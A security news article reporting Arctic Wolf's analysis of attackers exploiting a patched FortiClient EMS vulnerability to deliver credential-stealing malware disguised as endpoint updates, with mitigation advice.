Cybercriminals have been actively exploiting a critical vulnerability in the FortiClient Endpoint Management Server (EMS) to spread credential-stealing malware. The flaw, which has since been patched, was misused by threat actors to disguise malware as legitimate updates.
Exploitation of FortiClient EMS Vulnerability
According to Arctic Wolf, the cyberattack leverages the now-patched CVE-2026-35616 vulnerability, which scored 9.1 on the CVSS scale. This pre-authentication API access bypass allows for privilege escalation, enabling attackers to manipulate the endpoint management infrastructure deceitfully. The vulnerability was rectified in FortiClient EMS version 7.4.7 and subsequent versions.
By mimicking legitimate management operations, hackers were able to execute malicious PowerShell commands on managed endpoints. This tactic enabled them to alter configurations, delay firmware updates, and insert harmful scripts into Remote Access Profiles.
Malicious Use of PowerShell and FortiClient Tools
Arctic Wolf’s analysis reveals that the attackers used FortiClient’s management pathways to distribute malicious commands. They disguised the malware payload as FortiClient endpoint updates, executing them stealthily through PowerShell scripts.
Furthermore, the attackers leveraged a legitimate executable, “fortitray.exe,” to run a command script, which activated a Base64-encoded PowerShell command. This command was responsible for downloading and executing a malicious payload, subsequently sending data to an attacker-controlled server.
Impact and Mitigation Measures
The malware, masquerading as “FortiEndpoint_Patch.exe,” is capable of extracting sensitive information such as passwords and credit card details from web browsers. However, it lacks the ability to exfiltrate data over the network directly; this task is performed by the PowerShell script used in the attack.
Arctic Wolf warns that the exfiltrated session cookies and stored credentials could give attackers access to various online services and internal systems, bypassing multi-factor authentication in some cases. Organizations are urged to update their FortiClient EMS to the latest version and review endpoint management configurations to prevent similar intrusions.
In conclusion, the exploitation of this FortiClient EMS vulnerability underscores the need for constant vigilance in cybersecurity practices. Updating software and monitoring network activities remain crucial in defending against such sophisticated threats.
